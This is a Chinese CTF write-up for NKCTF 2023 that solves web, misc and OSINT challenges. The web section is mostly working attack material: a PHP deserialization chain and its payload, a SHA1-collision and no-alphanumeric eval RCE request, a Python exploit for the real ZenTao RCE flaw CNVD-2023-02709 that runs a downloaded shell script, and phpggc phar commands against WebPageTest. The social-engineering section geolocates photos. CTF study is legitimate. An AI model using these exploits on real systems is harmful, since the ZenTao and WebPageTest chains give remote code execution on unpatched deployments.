Web
baby_php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| <?php
error_reporting(0);
class Welcome{
public $name;
public $arg = 'oww!man!!';
public function __construct(){
$this->name = 'ItS SO CREAZY';
}
public function __destruct(){
if($this->name == 'welcome_to_NKCTF'){
echo $this->arg;
}
}
}
function waf($string){
if(preg_match('/f|l|a|g|\*|\?/i', $string)){
die("you are bad");
}
}
class Happy{
public $shell;
public $cmd;
public function __invoke(){
$shell = $this->shell;
$cmd = $this->cmd;
waf($cmd);
eval($shell($cmd));
}
}
class Hell0{
public $func;
public function __toString(){
$function = $this->func;
$function();
}
}
if(isset($_GET['p'])){
unserialize($_GET['p']);
}else{
highlight_file(__FILE__);
}
?>
|
简单的链子
Welcome::__destruct -> Hell0::__toString -> Happy::__invoke()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| <?php
class Welcome{
public $name;
public $arg = 'oww!man!!';
public function __destruct(){
if($this->name == 'welcome_to_NKCTF'){
echo $this->arg;
}
}
}
function waf($string){
if(preg_match('/f|l|a|g|\*|\?/i', $string)){
die("you are bad");
}
}
class Happy{
public $shell;
public $cmd;
public function __invoke(){
$shell = $this->shell;
$cmd = $this->cmd;
waf($cmd);
eval($shell($cmd));
}
}
class Hell0{
public $func;
public function __toString(){
$function = $this->func;
$function();
}
}
$hap=new Happy();
$hap->shell="system";
$hap->cmd="uniq /[!b]1[!b][!b]";
$Hell=new Hell0();
$Hell->func=$hap;
$wel=new Welcome();
$wel->name=$Hell;
echo serialize($wel);
|
waf我用glob通配符绕过了,
1
| O:7:"Welcome":2:{s:4:"name";O:5:"Hell0":1:{s:4:"func";O:5:"Happy":2:{s:5:"shell";s:6:"system";s:3:"cmd";s:19:"uniq /[!b]1[!b][!b]";}}s:3:"arg";s:9:"oww!man!!";}
|
eazy_php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <?php
highlight_file(__FILE__);
error_reporting(0);
if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])){
if((string)$_POST['c'] != (string)$_POST['d'] && sha1($_POST['c']) === sha1($_POST['d'])){
if($_GET['e'] != 114514 && intval($_GET['e']) == 114514){
if(isset($_GET['NS_CTF.go'])){
if(isset($_POST['cmd'])){
if(!preg_match('/[0-9a-zA-Z]/i', $_POST['cmd'])){
eval($_POST['cmd']);
}else{
die('error!!!!!!');
}
}else{
die('error!!!!!');
}
}else{
die('error!!!!');
}
}else{
die('error!!!');
}
}else{
die('error!!');
}
}else{
die('error!');
}
?>
|
md5数组绕过
sha1强碰撞绕过
114514用小数绕过
NS_CTF.go 用php非法传参传入
最后rce用无字母数字
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /?a[]=0&b[]=1&e=114514.123&NS[CTF.go=0 HTTP/1.1
Host: 0e12c38a-3592-4fe0-9c37-6b4c7f8c947e.node2.yuzhian.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://0e12c38a-3592-4fe0-9c37-6b4c7f8c947e.node2.yuzhian.com.cn/
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1383
c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%00%06%00"|"%60%60%60%20%2f%60%2a");
|
easy_pms
前段时间的洞,CNVD-2023-02709,禅道项目管理系统RCE漏洞
参考
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests
proxies = {
}
def check(url):
url1 = url+'/misc-captcha-user.html'
url3 = url + 'repo-create.html'
url4 = url + 'repo-edit-10000-10000.html'
headers={
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language":"zh-CN,zh;q=0.9",
"Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
}
headers2 = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
"Content-Type":"application/x-www-form-urlencoded",
"X-Requested-With":"XMLHttpRequest",
"Referer":url+"/repo-edit-1-0.html"
}
data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
data2 = 'SCM=Subversion&client=`/bin/bash /tmp/shell.sh`'
s=requests.session()
try:
req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
print(req4.text)
return True
except Exception as e:
print(e)
return False
if __name__ == '__main__':
print(check("http://07820cd2-8daa-40d9-ac13-fadb54cc8397.node2.yuzhian.com.cn/"))
|
emmm,这里和文章一样,没有成功反弹shell
试了一下wget,因为环境不同,没有成功执行,应该是没有,于是用curl下载
bash执行恶意文件成功连上
hard_php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| <?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['NKCTF'])) {
$NK = $_POST['NKCTF'];
if (is_string($NK)) {
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){
eval($NK);
}else{
echo("hacker!!!");
}
}else{
phpinfo();
}
}
?>
|
payload:
1
| NKCTF=$%ff=(_/_._)[''!=''];$%ff++;$%fb=$%ff++;$%fd=_.$%ff++;$%ff++;$%ff++;$_=$%fd.$%fb.$%ff++.$%ff;$$_[$%ff]($$_[_]);&T=readfile&_=/flag
|
webpagetest
AVD-2022-1474319
按照文章做就行
1
2
3
4
5
6
7
| ./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini
#进行url编码
URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
#写入文件
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
#触发反序列化
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -
|
easy_cms
后台是默认账号密码admin/admin
https://www.cnblogs.com/seizer/p/17146267.html
MISC
hard-misc
1
| JYYHOYLZIJQWG27FQWWOJPEX4WH3PZM3T3S2JDPPXSNAUTSLINKEMMRQGIZ6NCER42O2LZF2Q3X3ZAI=
|
base32
1
2
| N0wayBack公众号回复:
NKCTF2023我来了!
|
THMaster
我自己用cheatenginer找地址没找到,直到看到这篇
http://sobereva.com/45
给出了详细的地址
1
2
3
4
| 得点,004B0C44,数值为屏幕显示的值的1/10。
Power,004B0C48,内存中数值为显示的数值的100倍,如1.03为103。建议锁在399,然后吃一个红P就满了,并实际生效了。设400或更多不直接起作用
残机数,004B0C98,数值与实际残机数一致,1个即为1,非整数残机不算。
SC数,004B0CA0,数值与实际SC数一致,1个即为1,非整数SC不算。
|
试了一下是可行的
先打开THmaster.exe 再打开th12.exe,12c.exe不会被检测到。
cheat engine 直接添加地址,打开游戏后修改值
分改到两亿后会弹出提示
flag在replay/th12_01.rpy文件后(好像不做前面的步骤也在里面。。
Social Engineering
狂飙
1
2
3
4
5
| 帮我找到高启强,告诉他我想吃鱼了
链接:https://pan.baidu.com/s/1mRhKW9e0GvHBC4pLmNY-JQ 提取码:2023
格式:NKCTF{xx省xx市xx区xx街道}或NKCTF{xx省xx市xx区xx路}
|
搜索狂飙旧厂街取景地,得到
两个人的夜晚
1
2
3
4
5
| 朋友圈里看到的,两个人出去玩了捏,而我却在宿舍给NKCTF出题QAQ。
链接:https://pan.baidu.com/s/1SHzO-rkZJmmCofVGWsmaig 提取码:2023
格式:NKCTF{南京市下关区热河南路街道(镇)热河南路46号热河南路幼儿园}
|
图片有清晰的NCC新城市中心,能搜到是天津的一个大型商场
1
| NKCTF{天津市西青区中北镇万卉路3号NCC新城市中心}
|
Bridge
1
2
3
| 题目描述:flag形式为:NKCTF{}
例如:NKCTF{广东省广州市天河区天河公园}
|
根据百度识图,可以找到
范围缩小至海口市,
点进https://www.sohu.com/a/288268178_664217,这篇帖子
可以得到
不得不提的是海口真美,
旅程的开始
1
2
3
4
| 走向远方的旅程,是从这里开始的。
格式:NKCTF{xx省xx市xx区xx街道xx号} NKCTF{xx省xx市xx区xx路xx号}
|
通过图片的GPS定位能定到贵阳站,卡住的点是号数那里,定位的位置在公交站,但是没有搜到具体的地址
失败尝试
1
2
3
4
5
6
| NKCTF{贵州省贵阳市南明区四通街1号}
NKCTF{贵州省贵阳市南明区遵义路253号}
NKCTF{贵州省贵阳市南明区遵义路362号}
NKCTF{贵州省贵阳市南明区飞行街28号}
NKCTF{贵州省贵阳市南明区玉田坝路50号}
NKCTF{贵州省贵阳市南明区飞行街141号}
|
flag
real-social-engineering
在taco师傅的blog上,驾照上面有身份证号
涉及个人隐私就不贴上来了
最后,感谢各位出题师傅。
